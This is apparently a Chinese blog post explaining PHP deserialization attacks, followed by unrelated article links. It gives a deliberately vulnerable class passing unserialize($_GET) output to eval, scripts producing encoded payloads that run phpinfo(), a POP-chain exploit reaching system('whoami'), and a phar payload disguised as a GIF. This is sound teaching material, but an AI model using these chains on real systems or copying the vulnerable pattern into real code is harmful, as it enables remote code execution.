之前听漏洞银行的一个女生讲php反序列化。她说了一句。php反序列话找public变量。

导致我以为必须php反序列化。可控的变量必须是public or protected。private私有的变量不可以。

今天测试了一下。private变量也是也可以的。

class Test{

    private $test;

    public function __construct($test)

    {

        $this->test = $test;

    }

    public function __destruct()

    {

        eval($this->test);

    }

}unserialize($_GET['a']);

payload1:

class Test                             //O%3A4%3A%22Test%22%3A1%3A%7Bs%3A10%3A%22%00Test%00test%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D

{

    private $test;

    public function __construct($test){

        $this->test = $test;

    }

}

$a = new Test('phpinfo();');

echo urlencode(serialize($a));

payload2:

class Test                             //O%3A4%3A%22Test%22%3A1%3A%7Bs%3A10%3A%22%00Test%00test%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D

{

    private $test;

    public function __construct($test){

        $this->test = 'phpinfo()';

    }

}

$a = new Test();

echo urlencode(serialize($a));

paload3:

class Test                             //O%3A4%3A%22Test%22%3A1%3A%7Bs%3A10%3A%22%00Test%00test%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D

{

    private $test='phpinfo();';

}

$a = new Test();

echo urlencode(serialize($a));

payload4:这样构造的pyload的是不行的。因为变量是private属性。这种情况的pyload只能是public.

class Test

{

    private $test;

    public function __construct($test){

        $this->test = $test;

    }

}

$a = new Test();

$a->test='phpinfo();';

echo urlencode(serialize($a)); //O%3A4%3A"Test"%3A1%3A%7Bs%3A10%3A"%00Test%00test"%3Bs%3A9%3A"phpinfo%28%29"%3B%7D

以上是对序列化变量覆盖的常用4中方法。其中反序列化时是不会执行__construct这个函数的。

总结:

php反序列的时候可控的变量可以是:public、private、protected

其中php反序列化形成的关键:

1、存在反序列化可控的变量

2、找危险函数的类(当找不到危险函数的类的时候,可以尝试利用内置的类构造。http://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html

3、形成pop链(不一定都是变量覆盖,可以覆盖其方法。http://www.cnblogs.com/iamstudy/articles/php_object_injection_pop_chain.html

eg:2.php  2.php中__destruct中有events和event俩个可控变量。可以将events赋值给test2类,因为test2中没有fire方法,就会调用test2类中的__call方法

test2中的formatters变量可控。

include("./3.php");

class test1

    {

        protected $events;

        protected $event;

        public function __construct($events, $event)

        {

            $this->event = $event;

            $this->events = $events;

        }

        public function __destruct()

        {

            $this->events->fire($this->event);

        }

    }

unserialize($_GET['a']);

3.php

<?php

    class test2

    {

        protected $formatters;

        function __construct($forma){

            $this->formatters = $forma;

        }

        public function format($formatter, $arguments = array())

        {

            return call_user_func_array($this->getFormatter($formatter), $arguments);

        }

        public function getFormatter($formatter)

        {

            if (isset($this->formatters[$formatter])) {

                return $this->formatters[$formatter];

            }

        }

        public function __call($method, $attributes)

        {

            return $this->format($method, $attributes);

        }

    }

exp.php

<?php

class test1

    {

        protected $events;

        protected $event;

        public function __construct($events, $event)

        {

            $this->event = $event;

            $this->events = $events;

        }

        public function __destruct()

        {

            $this->events->fire($this->event); //让fire可控制

        }

    }

class test2

{

        protected $formatters;

        function __construct($forma){

            $this->formatters = $forma;

        }

                               // fire            whoami

        public function format($formatter, $arguments = array())

        {                            system                whoami

             return call_user_func_array($this->getFormatter($formatter), $arguments);

        }

        public function getFormatter($formatter)

        {                                // ['fire'=>'system']

            if (isset($this->formatters[$formatter])) {

                return $this->formatters[$formatter];   //system

            }

        }

        public function __call($method, $attributes)

        {                          //fire   whoami

            return $this->format($method, $attributes);

        }

}

 $fs = array("fire"=>"system");

 $gen = new test2($fs);

 $pb = new test1($gen,"whoami");

 echo urlencode(serialize($pb));

 // call_user_func('system','whoami');

这几个函数参数变量可控也可能导致反序列化漏洞

include('./1.phar');

file_exists('phar://./1.phar');

file_get_contents('phar://./1.phar');

生成phar

$fs = array("fire"=>"system");

$gen = new test2($fs);

$pb = new test1($gen,"whoami");

$p = new Phar('./1.phar', 0);

$p->startBuffering();

$p->setStub('GIF89a<?php __HALT_COMPILER(); ?>');

$p->setMetadata($pb);

$p->addFromString('1.txt','text');

$p->stopBuffering();

rename('./1.phar', '3.gif');

php反序列化的更多相关文章

  1. C#反序列化XML异常:在 XML文档(0, 0)中有一个错误“缺少根元素”

    Q: 在反序列化 Xml 字符串为 Xml 对象时,抛出如下异常. 即在 XML文档(0, 0)中有一个错误:缺少根元素. A: 首先看下代码: StringBuilder sb = new Stri ...

  2. C# 序列化与反序列化几种格式的转换

    这里介绍了几种方式之间的序列化与反序列化之间的转换 首先介绍的如何序列化,将object对象序列化常见的两种方式即string和xml对象; 第一种将object转换为string对象,这种比较简单没 ...

  3. 迟来的Json反序列化

    源码发布 搞了一个下午,终于搞定了这个号称中国的github...以后源码直接在这里发布了(github实在用不来,英文实在太烂了) https://code.csdn.net/jy02305022/ ...

  4. .Net使用Newtonsoft.Json.dll(JSON.NET)对象序列化成json、反序列化json示例教程

    JSON作为一种轻量级的数据交换格式,简单灵活,被很多系统用来数据交互,作为一名.NET开发人员,JSON.NET无疑是最好的序列化框架,支持XML和JSON序列化,高性能,免费开源,支持LINQ查询 ...

  5. 使用Newtonsoft.Json.dll(JSON.NET)动态解析JSON、.net 的json的序列化与反序列化(一)

    在开发中,我非常喜欢动态语言和匿名对象带来的方便,JSON.NET具有动态序列化和反序列化任意JSON内容的能力,不必将它映射到具体的强类型对象,它可以处理不确定的类型(集合.字典.动态对象和匿名对象 ...

  6. 【.NET深呼吸】如何反序列化动态JSON

    .net本身除了支持SOAP.XML.二进制等序列化和反序列化,后来也加入了对JSON的序列化的支持.然而,在实际开发中,常常会遇到结构不确定的JSON对象,这些对象可能是其他代码动态生成的,你事先无 ...

  7. Java 序列化与反序列化

    1.什么是序列化?为什么要序列化? Java 序列化就是指将对象转换为字节序列的过程,而反序列化则是只将字节序列转换成目标对象的过程. 我们都知道,在进行浏览器访问的时候,我们看到的文本.图片.音频. ...

  8. C#中怎样实现序列化和反序列化

    我们想要将数据进行持久化的操作的话,也就是将数据写入到文件中,我们在C#中可以通过IO流来操作,同时也可以通过序列化来操作,本人是比较推荐使用序列化操作的 因为我们如果想要将一个对象持久化到文件中 如 ...

  9. Java序列化与反序列化

    Java序列化与反序列化是什么?为什么需要序列化与反序列化?如何实现Java序列化与反序列化?本文围绕这些问题进行了探讨. 1.Java序列化与反序列化 Java序列化是指把Java对象转换为字节序列 ...

  10. 让Visual Studio 2013为你自动生成XML反序列化的类

    Visual Sutdio 2013增加了许多新功能,其中很多都直接提高了对代码编辑的便利性.如: 1. 在代码编辑界面的右侧滚动条上显示不同颜色的标签,让开发人员可以对所编辑文档的修改.查找.定位情 ...

随机推荐

  1. C# 泛型使用笔记

    泛型的基本概念我就不在这重复了,不了解的同学请自行百度. 我主要写下我在项目中要到的泛型实例.献丑了.....有什么不好或不对的地方大家尽可评论留言. 为什么要用泛型? 通过使用泛型,我们可以极大地提 ...

  2. JS实现图的创建和遍历

    图分为无向图和有向图 图的存储结构有邻接矩阵.邻接表.十字链表.邻接多重表这四种,最常用的是前两种 本篇主要是利用邻接矩阵实现无向图的创建和遍历(深度优先.广度优先),深度优先其实就是二叉树里的前序遍 ...

  3. 用手机访问管理mysql

    移动办公的情况及需求越来越多,平时MySQL,Oracle,SQLServer等数据库的管理都要通过客户端工具操作,现在有一款基于web网页的软件:TreeSoft数据库管理系统,在服务器布署一套后, ...

  4. 记录一次使用terminal进行git管理与提交到Github的过程

    1.环境的构建: 使用Mac系统自带的Git进行版本管理存在,Git是系统的Xcode集成的 查看版本的命令: $ git --version git version (Apple Git-) 查看g ...

  5. spring boot包扫描不到controller层

    启动类代码 package com.maven.demo; import org.mybatis.spring.annotation.MapperScan; import org.springfram ...

  6. Struts 类型转换之局部和全局配置

    我们碰到过很多情况,就是时间日期常常会出现错误,这是我们最头疼的事,在struts2中有一些内置转换器,也有一些需要我们自己配置. 我们为什么需要类型转换呢? 在基于HTTP协议的Web应用中 客户端 ...

  7. UOJ#316. 【NOI2017】泳池

    传送门 一道 \(DP\) 好题 设 \(q\) 为一个块合法的概率 套路一恰好为 \(k\) 的概率不好算,算小于等于 \(k\) 的减去小于等于 \(k-1\) 的 那么设 \(f_i\) 表示宽 ...

  8. Maven学习总结(一):基本概念

    一.Maven的基本概念 Maven(翻译为"专家","内行")是跨平台的项目管理工具.主要服务于基于Java平台的项目构建,依赖管理和项目信息管理. 1.1. ...

  9. v-model实现

    v-model就是输入的值实时显示的目的,如果纯粹写登录页面的form控件没有实时显示的需求 就不用绑定v-model.

  10. [Swift] 创建一个对象

    创建一个对象 先写一个People类 // // People.swift // Class // // Created by YouXianMing on 15/3/18. // Copyright ...